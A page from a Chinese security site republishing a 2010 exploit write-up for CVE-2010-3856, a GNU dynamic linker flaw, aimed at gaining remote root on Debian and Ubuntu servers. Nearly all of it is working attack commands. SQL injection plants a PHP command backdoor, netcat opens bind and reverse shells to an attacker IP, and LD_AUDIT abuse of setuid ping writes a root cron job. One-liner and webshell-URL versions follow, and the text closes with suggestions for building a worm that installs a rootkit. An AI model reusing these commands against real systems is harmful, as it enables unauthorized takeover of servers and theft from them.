首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
来源:fhausberger[at]gmail[dot]com 作者:jmit 发布时间:2010-10-29  
# Exploit Title:	Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
# Date: 		24-10-2010
# Author: 		jmit
# Mail: 		fhausberger[at]gmail[dot]com 
# Tested on: 		Debian 5.0.6
# CVE:			CVE-2010-3856

--------------
| DISCLAIMER |
--------------

# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

--------- 
| ABOUT |
---------

Debian/Ubuntu remote root exploitation example (GNU dynamic linker DSO vuln).
See (http://www.exploit-db.com/exploits/15304/). Should work on other linux
distros too.

--------------
| BACKGROUND |
--------------

Typically it isn't possible to use a suidshell or modify /etc/passwd directly after
webshell access (user nobody) to gain root access. But with the DSO vuln we can
launch commands as root and we can create a socket and connect to the user or setup
a bindshell.

----------- 
| EXPLOIT |
-----------

After you have found a SQL-Injection vuln you can create a php backdoor. This is typically
possible with select into dumpfile/outfile statement. The values are a simple
<? passthru(
___FCKpd___0
GET['c']); ?> backdoor. --- DROP TABLE IF EXISTS `fm`; CREATE TABLE `fm` ( `fm` longblob ) TYPE=MyISAM; insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e); select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php'; drop table fm; flush logs; --- Now you can connect to the server and create a connection with telnet, nc, write binary with perl -e ' print "\x41\x42\x43\x44"', echo -en '\x41\x42\x43\x44', ... If direct shell access isn't possible you can use phpcode to create your own binary with php fwrite: --- <?php $File = "/tmp/nc"; $Handle = fopen($File, 'w'); $Data = "\x41\x42\x43\x44"; fwrite($Handle, $Data); fclose($Handle); ?> --- Now use Bind-Shell: http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash Reverse-Shell: http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash in your webbrowser and connect to your shell $ nc victimip 9999 id uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) --- Now lets exploit the DSO vuln. You need umask 0 for correct rw-rw-rw creation of exploit /etc/cron.d/exploit $ umask 0 This is the shellscript for the cron.d entry. Bind-Shell: $ echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh Reverse-Shell: $ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh Now make your shellscript executable for cron: $ chmod u+x /tmp/exploit.sh Create rw-rw-rw file in cron directory using the setuid ping program: $ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping Launch every minute a suid root shell $ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit Now you have a root shell every minute. $ nc attackerip 79 id uid=0(root) gid=0(root) groups=0(root) ------------------- | EXPLOIT oneline | ------------------- echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit $ nc attackerip 79 id uid=0(root) gid=0(root) groups=0(root) ------------------------------ | EXPLOIT from webshell only | ------------------------------ http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping http://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit $ nc attackerip 79 id uid=0(root) gid=0(root) groups=0(root) --------------------------------- | EXPLOIT from webshell oneline | --------------------------------- http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit $ nc attackerip 79 id uid=0(root) gid=0(root) groups=0(root) --------- | IDEAS | --------- Looks like a wormable bug. The urlobfuscated (IDS/IPS) worm search for SQLI/BSQLI bugs or remote code execution bugs. Then the worm injects the evil url and do the same for other ips. It installs a rootkit-bot and the game is over.

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apache 2.0 - (apterous) file D
·PHPKit <= 1.6.1 R2 overview.ph
·CoWebserver Denial of Service
·mygamingladder MGL Combo Syste
·DATAC RealWin SCADA 1.06 Buffe
·Firefox 3.6.8 - 3.6.11 Interle
·Home FTP Server Post-Auth Dire
·RoSPORA <= 1.5.0 Remote PHP Co
·XBMC 9.04.1r20672 soap_action_
·yPlay v2.4.5 Denial of Service
·Platinum SDK Library post upnp
·Home FTP Server v1.11.1.149 RE
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved